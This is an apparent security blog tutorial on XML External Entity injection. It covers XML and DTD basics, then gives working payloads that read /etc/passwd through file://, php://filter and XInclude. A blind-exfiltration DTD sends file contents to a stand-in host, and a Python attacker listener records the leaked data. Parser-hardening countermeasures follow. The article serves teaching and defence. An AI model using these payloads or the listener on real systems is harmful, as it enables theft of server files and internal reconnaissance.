XML Injection

Attack possibilities and countermeasures

by Andrea Hauser

on October 05, 2023

Keypoints

How to carry out XML Injection

The Extensible Markup Language (XML) is a way of transferring data
XML External Entities can be used for injection
This can leak internal data and, if combined with other vulnerabilities, lead to remote code execution (RCE)
XML parsers should be configured in such a way that external entities and XInclude statements are not parsed

Although XML is no longer one of the most popular ways of transferring data, we still encounter it from time to time, and every now and then we find a non-hardened application that is vulnerable to XXE injection, where XXE stands for XML External Entity. XXE injections can be used to read files on the attacked system and, where reachable, to interact with other internal or external systems. Sometimes the XXE can even be combined with server-side request forgery (SSRF) to carry out further attacks.

Before we can go into XXE Injection in detail, however, we first need to define what XML and External Entities themselves are. XML stands for Extensible Markup Language and is intended as a text-based format for the exchange and storage of structured information. For example, an XML file used to represent a book might look like this:

<?xml version="1.0" encoding="UTF-8"?>
<book> <!-- root node -->
    <author id="1"> <!-- node with attribute -->
        <firstname> <!-- child of author node -->
            1337h4x0r <!-- node value -->
        </firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>
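To see how a parser views this structure, the following minimal sketch parses the same book document with Python's standard xml.etree.ElementTree module. This module is chosen only for illustration, and the explanatory comments are left out of the document. The sketch reads the root node, the attribute and the node values:

```python
import xml.etree.ElementTree as ET

# The book document from above, without the explanatory comments.
BOOK_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>"""

root = ET.fromstring(BOOK_XML)        # root node: <book>
author = root.find("author")          # child node carrying the id attribute
print(root.tag)                       # book
print(author.get("id"))               # 1
print(author.find("firstname").text)  # 1337h4x0r
print(root.find("title").text)        # Best Hacking Book!
```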

Optionally, a Document Type Definition (DTD) can also be used in XML. A DTD defines how the XML document must be structured and can be used to validate it. DTDs can be defined either internally, that is within the XML file itself, or externally, that is in a separate file loaded, for example, from another server. An internal DTD for the example shown above could look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
    <!ELEMENT book (author, title)>
    <!ELEMENT author (firstname, lastname)>
    <!ATTLIST author id CDATA #REQUIRED>
    <!ELEMENT firstname (#PCDATA)>
    <!ELEMENT lastname (#PCDATA)>
    <!ELEMENT title (#PCDATA)>
]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>

As an external DTD, it would look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book SYSTEM "https://example.com/example.dtd">
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>Best Hacking Book!</title>
</book>

The file example.dtd on example.com would then contain the following:

<!ELEMENT book (author, title)>
<!ELEMENT author (firstname, lastname)>
<!ATTLIST author id CDATA #REQUIRED>
<!ELEMENT firstname (#PCDATA)>
<!ELEMENT lastname (#PCDATA)>
<!ELEMENT title (#PCDATA)>

A DTD can also declare custom entities, which in turn can be defined as internal or external entities. Here is the example with an internal entity:

<!DOCTYPE book [
    <!ELEMENT book (author, title)>
    <!ELEMENT author (firstname, lastname)>
    <!ATTLIST author id CDATA #REQUIRED>
    <!ELEMENT firstname (#PCDATA)>
    <!ELEMENT lastname (#PCDATA)>
    <!ELEMENT title (#PCDATA)>
    <!ENTITY example "Example Entity"> <!-- Definition Entity -->
]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

When the document is parsed, the reference &example; is replaced by the declared text, so Example Entity becomes the title.
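The entity expansion can be reproduced with a minimal Python sketch. It assumes Python's standard xml.etree.ElementTree parser and reduces the DTD to the entity declaration. The parser replaces &example; with the declared text:

```python
import xml.etree.ElementTree as ET

# Internal entity declared in the DTD and referenced as &example; in <title>.
DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
    <!ENTITY example "Example Entity">
]>
<book>
    <title>&example;</title>
</book>"""

root = ET.fromstring(DOC)
print(root.find("title").text)  # Example Entity
```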

And the following is the example with an external entity:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY example SYSTEM "https://example.com/example.dtd"> ] >
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

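On example.com, the file example.dtd then contains only the replacement text of the entity, not a further declaration:

Example Entity

When the document is parsed, the parser fetches this file and inserts its content as the title.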

Exploiting External Entity Injection

An attacker can misuse the DTD and entity definitions shown above for malicious purposes. A web application that uses XML to transfer data has an XML parser on the server side that processes this data. If an attacker can get this parser to resolve external entities, for example to include internal files via file:// and an internal path, the attacker can gain access to internal information.

Let’s take the example used above as the starting point for a request to a web server. If an attacker wants to read a local file on the server, the following malicious XML external entity payload can be sent:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [ <!ENTITY example SYSTEM "file:///etc/passwd"> ] > <!-- malicious part of the query -->
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>

If the /etc/passwd file can be read, its contents might either be displayed in the response in place of the book title, or be revealed in an error message such as the following:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
Content-Length: 600

"Invalid title: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
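The following Python sketch shows what a non-hardened parser does with such a payload. It builds a deliberately vulnerable toy parser on top of the standard xml.parsers.expat module. The function names are hypothetical, and instead of /etc/passwd the sketch reads a throwaway file in a temporary directory. Real vulnerable parsers resolve entities through their own internal mechanisms, so this only mimics the behaviour for a local lab:

```python
import pathlib
import tempfile
import xml.parsers.expat
from urllib.parse import urlsplit
from urllib.request import url2pathname


def vulnerable_title(xml_bytes: bytes) -> str:
    """Return the text of <title>, resolving file:// external entities.

    Deliberately insecure toy parser for a local lab, not for real use.
    """
    parser = xml.parsers.expat.ParserCreate()
    inside_title = False
    chunks = []

    def on_start(name, attrs):
        nonlocal inside_title
        if name == "title":
            inside_title = True

    def on_end(name):
        nonlocal inside_title
        if name == "title":
            inside_title = False

    def on_text(data):
        if inside_title:
            chunks.append(data)

    def install(p):
        p.StartElementHandler = on_start
        p.EndElementHandler = on_end
        p.CharacterDataHandler = on_text
        p.ExternalEntityRefHandler = on_external_entity

    def on_external_entity(context, base, system_id, public_id):
        # The missing hardening: the entity's SYSTEM URL is followed blindly.
        url = urlsplit(system_id)
        if url.scheme != "file":
            return 0  # 0 tells expat the entity could not be handled
        sub = parser.ExternalEntityParserCreate(context)
        install(sub)
        sub.Parse(pathlib.Path(url2pathname(url.path)).read_bytes(), True)
        return 1  # non-zero: entity handled, continue parsing

    install(parser)
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def demo_file_read() -> str:
    """Replay the /etc/passwd payload against a fake passwd file."""
    with tempfile.TemporaryDirectory() as tmp:
        fake_passwd = pathlib.Path(tmp) / "passwd"
        fake_passwd.write_text("root:x:0:0:root:/root:/bin/bash\n")
        payload = (
            '<?xml version="1.0" encoding="UTF-8"?>\n'
            f'<!DOCTYPE book [ <!ENTITY example SYSTEM "{fake_passwd.as_uri()}"> ] >\n'
            "<book><title>&example;</title></book>"
        ).encode("utf-8")
        return vulnerable_title(payload)
```

Calling demo_file_read() returns the content of the fake file as the "title", which is the same effect as the leaked /etc/passwd contents in the response above.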

If it is possible to read local files, the following lists can be used to identify and read files of interest:

At the same time, it should also be checked whether the XXE can be used for a server-side request forgery (SSRF) attack, that is, whether internal systems or, in cloud environments, metadata services can be queried and further exploited. For cloud instances, interesting endpoints are in this list, and more details and attack paths for SSRF attacks are described in the article on SSRF.

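When the attacked system is using PHP, the php://filter wrapper can be used to read files from the file system. Because the file contents are returned base64-encoded, characters such as < or & in the file, for example in PHP source code, do not break the XML parsing: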

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<book>
    <author id="1">
        <firstname>1337h4x0r</firstname>
        <lastname>Hacker</lastname>
    </author>
    <title>&example;</title>
</book>
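Because the php://filter wrapper returns the file base64-encoded, the attacker has to decode the value that appears in the response. The following minimal Python sketch shows that step; the function name is hypothetical. It also shows that the base64 alphabet contains no characters that are special in XML:

```python
import base64


def decode_filter_output(b64_text: str) -> str:
    """Decode the base64 text returned by php://filter/convert.base64-encode."""
    return base64.b64decode(b64_text.strip()).decode("utf-8")


# Round trip with content containing characters that would break XML parsing.
original = "<?php $total = 1 & 2; ?>\n"
encoded = base64.b64encode(original.encode("utf-8")).decode("ascii")
print(encoded)                        # only A-Z, a-z, 0-9, +, / and =
print(decode_filter_output(encoded))  # the original PHP line
```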

If the parser rejects a doctype defined by the attacker, or the attacker only controls part of the XML document and therefore cannot define one, an attack with XInclude can still be attempted. This would look as follows:

<example xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></example>
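Whether XInclude is processed depends on the application. In Python's standard library, for example, XInclude elements are only expanded if the application explicitly calls xml.etree.ElementInclude.include() after parsing. The following minimal sketch shows the effect; the helper names are hypothetical. The default loader of this module opens href as a local file path rather than a URL, so the sketch uses a plain path to a throwaway file instead of file:///etc/passwd:

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr


def parse_with_xinclude(xml_text: str) -> ET.Element:
    """Parse a document, then expand XInclude elements (unsafe for untrusted input)."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)  # default loader opens href as a local path
    return root


def demo_xinclude() -> str:
    """Include a fake passwd file as text, without any DOCTYPE in the document."""
    with tempfile.TemporaryDirectory() as tmp:
        fake_passwd = pathlib.Path(tmp) / "passwd"
        fake_passwd.write_text("root:x:0:0:root:/root:/bin/bash\n")
        doc = (
            '<example xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include parse="text" href={quoteattr(str(fake_passwd))}/>'
            "</example>"
        )
        # The xi:include element is replaced by the file content as text.
        return parse_with_xinclude(doc).text
```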

The attacks described so far only work if the parsed data is returned in the response. If it is not, a blind XXE injection can still be attempted: the payload makes the parser trigger network interactions with an attacker-controlled system and transmits data as part of these interactions. A full exploit could look like the following. The request contains this malicious DOCTYPE:

<!DOCTYPE book[<!ENTITY % xxe SYSTEM
"https://example.com/example.dtd"> %xxe;]>

and the following example.dtd is hosted on the attacker's system:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://example.com/?x=%file;'>">
%eval;
%exfiltrate;

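For this attack, XML parameter entities were used. They can only be referenced within the DTD itself and are declared as follows:

<!ENTITY % exampleentity "Parameter Entity Value" >

and referenced like this:

%exampleentity;

In the example.dtd above, the parser replaces %file; with the contents of /etc/passwd when it processes the declaration of eval, and the character reference &#x25; becomes a literal percent sign. Expanding %eval; therefore declares the parameter entity exfiltrate with the file contents in its URL, and %exfiltrate; makes the parser request that URL. The detour via an external DTD is needed because, in the internal DTD subset, parameter entity references are not allowed inside markup declarations.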
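On the attacker's side, the blind variant needs a web server that delivers example.dtd and records the incoming request carrying the file contents. The following is a minimal sketch using Python's http.server module. The host, port, paths and names are placeholders, and the URLs inside the DTD must point to wherever this listener is reachable from the target:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# The example.dtd from above; example.com is a placeholder for this listener.
EXAMPLE_DTD = b"""<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://example.com/?x=%file;'>">
%eval;
%exfiltrate;
"""


def extract_exfiltrated(path: str) -> Optional[str]:
    """Return the URL-decoded value of the x query parameter, if present."""
    values = parse_qs(urlsplit(path).query).get("x")
    return values[0] if values else None


class ExfiltrationHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        if urlsplit(self.path).path == "/example.dtd":
            # Step 1: the vulnerable parser fetches the external DTD (%xxe;).
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.end_headers()
            self.wfile.write(EXAMPLE_DTD)
            return
        # Step 2: %exfiltrate; makes the parser request /?x=<file contents>.
        leaked = extract_exfiltrated(self.path)
        if leaked is not None:
            print("exfiltrated:", leaked)
        self.send_response(204)
        self.end_headers()


def run(host: str = "0.0.0.0", port: int = 8080) -> None:
    """Serve until interrupted; not started automatically."""
    HTTPServer((host, port), ExfiltrationHandler).serve_forever()
```

In a lab, run() would be started on the attacker system before the request with the malicious DOCTYPE is sent. Depending on the parser, file contents with line breaks or special characters may not survive in a URL, so short single-line files are the most reliable test targets.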

Reports from public bug bounty programmes show that XXE injection is still a problem that can occur in many different situations, for example in image uploads, audio uploads or VoiceXML specifications. They also show that an initial read-only vulnerability can be exploited further in combination with other vulnerabilities, which, for example, led to remote code execution at the DoD. If, after reading this article, you are interested in trying out this type of vulnerability yourself, you can do so legally in the PortSwigger labs.

Countermeasures

The best way to protect against XML External Entity Injection is to configure the parser so that external entities and XInclude are not parsed or allowed. If the application does not need DTDs at all, disabling DTD processing entirely is the safest option. The OWASP Cheat Sheet on XXE prevention contains specific configurations per programming language and parser.
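The following is a minimal Python sketch of the strictest option, which rejects any DTD in untrusted input. It uses the standard xml.parsers.expat module to refuse documents with a DOCTYPE before handing them to xml.etree.ElementTree. The names parse_untrusted and DTDForbidden are hypothetical. Maintained libraries such as defusedxml offer comparable checks ready-made, and for other languages and parsers the OWASP Cheat Sheet remains the reference:

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when an untrusted document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as "<!DOCTYPE" is seen, before any entity is declared.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse untrusted XML only if it contains no DTD at all (hypothetical helper)."""
    guard = xml.parsers.expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject_doctype
    guard.Parse(data, True)  # raises DTDForbidden for any DOCTYPE
    # Without a DTD there are no entity declarations to abuse; ElementTree also
    # does not process XInclude unless xml.etree.ElementInclude is called explicitly.
    return ET.fromstring(data)
```

Parsing the data twice costs some performance. The sketch favours a simple, easily reviewed check over speed.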

Conclusion

Although XML can no longer be considered the most popular data transfer format, it is still used in certain cases such as image uploads, SOAP messages and the like. When XML is used, care should be taken to prevent XML External Entity Injection possibilities as well as XInclude attacks by hardening the XML parser accordingly. In the absence of the suggested hardening, the effects can range from reading internal files, to exploring the internal network starting from the vulnerable server, and in the worst case to remote code execution if the vulnerability can be combined with other vulnerabilities.

About the Author

Andrea Hauser graduated with a Bachelor of Science FHO in information technology at the University of Applied Sciences Rapperswil. She is focusing her offensive work on web application security testing and the realization of social engineering campaigns. Her research focus is creating and analyzing deepfakes. (ORCID 0000-0002-5161-8658)
